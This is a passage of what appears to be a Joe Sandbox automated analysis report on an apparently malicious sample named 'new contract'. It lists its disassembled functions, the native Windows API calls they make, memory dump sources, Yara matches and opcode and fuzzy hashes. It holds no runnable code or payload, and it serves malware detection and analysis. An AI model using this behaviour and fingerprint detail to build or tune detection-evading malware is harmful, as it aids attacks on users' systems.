                                                                                                                                                                            control_flow_graph 261 41a320-41a336 262 41a33c-41a371 NtCreateFile 261->262 263 41a337 call 41af20 261->263 263->262
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                            • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                            • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                            Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 264 41a500-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                            • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                            • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                            Function 0041A44A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                            • Opcode ID: 9fe5d1c93b6a8fe11bef04f7bb6d9af7ce8ae07c87cfedba4cbb00d36a3d9ab0
                                                                                                                                                                            • Instruction ID: 5813a21dc4d1d5848b4b92187edf154de6f784026548f02ae2aefde2e4efb888
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fe5d1c93b6a8fe11bef04f7bb6d9af7ce8ae07c87cfedba4cbb00d36a3d9ab0
                                                                                                                                                                            • Instruction Fuzzy Hash: 68E0C2726411106BD720DBA4DC86EEB7B28EF44324F1845ADFA4CDB242C534E61087D0
                                                                                                                                                                            Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                            • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                            • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                                                                            Function 01662B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
                                                                                                                                                                            • Instruction ID: c094ff774621442249ccdcac35c2955db6d1e2b771fcc15579f40e1bd43956a3
                                                                                                                                                                            • Opcode Fuzzy Hash: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D90026120240003410575584818617400E97E0201B55C131E5014690EC5258D916225
                                                                                                                                                                            Function 01662BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 69a36abefe46d9a1aa9cd6432f09e5cc93e9e2ff33ae8a20f84b353b267e25f5
                                                                                                                                                                            • Instruction ID: c6849e1bfd3c8cf7815ecd82bb5a9ea22b1dd29454d0924a70bef014fda25150
                                                                                                                                                                            • Opcode Fuzzy Hash: 69a36abefe46d9a1aa9cd6432f09e5cc93e9e2ff33ae8a20f84b353b267e25f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 1490023120140802D1807558480864B000997D1301F95C125A4025754ECA158F5977A1
                                                                                                                                                                            Function 01662AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e93b157703c2a8edba07a0835b37a589a07f98f219307276279df38eaed497fb
                                                                                                                                                                            • Instruction ID: 22a0c5602167dc04f56710278e5ac1d60890ac0f729e9f2b723f2e14867e28d5
                                                                                                                                                                            • Opcode Fuzzy Hash: e93b157703c2a8edba07a0835b37a589a07f98f219307276279df38eaed497fb
                                                                                                                                                                            • Instruction Fuzzy Hash: C6900435311400030105FD5C0F0C507004FD7D5351355C131F5015750DD731CD715331
                                                                                                                                                                            Function 01662D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 57ed11ce04f73bae528b7a15e76a5fb5af136af5a6cfa2209e91dc89003f109f
                                                                                                                                                                            • Instruction ID: 077264464a19b4303da0f0ba24ea8771e0188bf338d04d41d1381306e3ec3074
                                                                                                                                                                            • Opcode Fuzzy Hash: 57ed11ce04f73bae528b7a15e76a5fb5af136af5a6cfa2209e91dc89003f109f
                                                                                                                                                                            • Instruction Fuzzy Hash: 5990022130140003D1407558581C6074009E7E1301F55D121E4414654DD9158D565322
                                                                                                                                                                            Function 01662D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: d18123388768f473314c7a4bc8a621c4c3a1f57f6425e76d0d7f97cc49e09338
                                                                                                                                                                            • Instruction ID: 23c44f9f7c0ccdde50e8a47e1582190f4d1dc869a6600f3b7a53e985c6ab7b2d
                                                                                                                                                                            • Opcode Fuzzy Hash: d18123388768f473314c7a4bc8a621c4c3a1f57f6425e76d0d7f97cc49e09338
                                                                                                                                                                            • Instruction Fuzzy Hash: A290022921340002D1807558580C60B000997D1202F95D525A4015658DC9158D695321
                                                                                                                                                                            Function 01662DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                                                                                                                                            • Instruction ID: 01099398d30b42247e3df16b17c272a8bb82719c0f9b863466386cdee242d7ec
                                                                                                                                                                            • Opcode Fuzzy Hash: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                                                                                                                                            • Instruction Fuzzy Hash: AB90023120140413D11175584908707000D97D0241F95C522A4424658ED6568E52A221
                                                                                                                                                                            Function 01662DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 3340b977abc0a125eb1d30446df286bb8c406af4b03142260aee87f5857f63db
                                                                                                                                                                            • Instruction ID: 9092915bf9b2b0314d6c4f44d434a8849fcda06ff662cf15e2b9e3beb717f164
                                                                                                                                                                            • Opcode Fuzzy Hash: 3340b977abc0a125eb1d30446df286bb8c406af4b03142260aee87f5857f63db
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E900221242441525545B5584808507400AA7E0241795C122A5414A50DC5269D56D721
                                                                                                                                                                            Function 01662C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                                                                                                                                            • Instruction ID: 8973fd18af62722bdd88b5a23aa77d3e606dfabfa1f0fd2dadebea27c8fbdbdc
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                                                                                                                                            • Instruction Fuzzy Hash: F190023120148802D1107558880874B000997D0301F59C521A8424758EC6958D917221
                                                                                                                                                                            Function 01662CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: ae21458706c8cfc987989e26298a1388cce1e368ccc0b41b065301feddffc57b
                                                                                                                                                                            • Instruction ID: 0f9aa48dc1d1c748ba24fd6d056fac7becae8afbb45ecd7bf4f8f4db6008dd1b
                                                                                                                                                                            • Opcode Fuzzy Hash: ae21458706c8cfc987989e26298a1388cce1e368ccc0b41b065301feddffc57b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3690023120140402D1007998580C647000997E0301F55D121A9024655FC6658D916231
                                                                                                                                                                            Function 01662F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                                                                                                                                            • Instruction ID: a8a622882e7305bc52a6ecbf61ce57e479468eff335fd8617a0820ab1c71a580
                                                                                                                                                                            • Opcode Fuzzy Hash: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                                                                                                                                            • Instruction Fuzzy Hash: 2690026134140442D10075584818B070009D7E1301F55C125E5064654EC619CD526226
                                                                                                                                                                            Function 01662FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                                                                                                                                            • Instruction ID: c1b14f7557f880ec428c1de71a6eff494f0090edb1a17938333871d27bef3753
                                                                                                                                                                            • Opcode Fuzzy Hash: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 71900221211C0042D20079684C18B07000997D0303F55C225A4154654DC9158D615621
                                                                                                                                                                            Function 01662FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                                                                                                                                            • Instruction ID: ccae4fdb42f9bdcf6bc8ffd2f993fdb2c939bc55f91398df76c5896a7296b46f
                                                                                                                                                                            • Opcode Fuzzy Hash: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                                                                                                                                            • Instruction Fuzzy Hash: 8890022160140042414075688C489074009BBE1211755C231A4998650EC5598D655765
                                                                                                                                                                            Function 01662F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
                                                                                                                                                                            • Instruction ID: 8e3bd5dde2208af87f2cde39045525fa13dfe0f9ddd9418f29816b31d6598206
                                                                                                                                                                            • Opcode Fuzzy Hash: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
                                                                                                                                                                            • Instruction Fuzzy Hash: 0090023120180402D10075584C1870B000997D0302F55C121A5164655EC6258D516671
                                                                                                                                                                            Function 01662EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
                                                                                                                                                                            • Instruction ID: 577adceda164299ae625314c4a374c6e25363ad44c8e2849a63a6511d0c8ee05
                                                                                                                                                                            • Opcode Fuzzy Hash: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
                                                                                                                                                                            • Instruction Fuzzy Hash: 6590027120140402D14075584808747000997D0301F55C121A9064654FC6598ED56765
                                                                                                                                                                            Function 01662E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
                                                                                                                                                                            • Instruction ID: 190e5d8c0731743c04a734760077fd6fbc74101c49768f65093c7f9ad80c4862
                                                                                                                                                                            • Opcode Fuzzy Hash: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
                                                                                                                                                                            • Instruction Fuzzy Hash: AE90022160140502D10175584808617000E97D0241F95C132A5024655FCA258E92A231
                                                                                                                                                                            Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                                                            • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                                                                            • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                                                                            • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                                                                            Function 0041A662 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateExitHeapProcess
                                                                                                                                                                            • String ID: &EA
                                                                                                                                                                            • API String ID: 1054155344-1330915590
                                                                                                                                                                            • Opcode ID: fbf9989a65e99e43cbca00d8cfc9c04f34207fc74a16e78092d61f3c6d2f3074
                                                                                                                                                                            • Instruction ID: 07c2672e5ef9689ab5b3ef21e0c9f8aa0f2526ad952a8cdbd55fb6fbb6c95729
                                                                                                                                                                            • Opcode Fuzzy Hash: fbf9989a65e99e43cbca00d8cfc9c04f34207fc74a16e78092d61f3c6d2f3074
                                                                                                                                                                            • Instruction Fuzzy Hash: A9F022B9204200BFD720DF68CC80EDB3B959F44318F05815AFC485B343D234DD1686B1
                                                                                                                                                                            Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 10 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID: &EA
                                                                                                                                                                            • API String ID: 1279760036-1330915590
                                                                                                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                            • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                                                                            Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 216 408308-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 225 40835c-40836e PostThreadMessageW 216->225 226 40838e-408392 216->226 227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_new contract.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                            • Opcode ID: c9237fdc43732a0a8c57769e8a9f2c156fe9de07182f218656ee6ff0cd478d85
                                                                                                                                                                            • Instruction ID: 2ef4646d849cd2d695c638bfdfcd82ceafcc94a06a713540becad9db5abc0352
                                                                                                                                                                            • Opcode Fuzzy Hash: c9237fdc43732a0a8c57769e8a9f2c156fe9de07182f218656ee6ff0cd478d85
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B01B971A4032877E720A6958C03FFE775CAB40B54F04012DFF04BA1C1E6A8690547E9
                                                                                                                                                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                            Download Yara Rule

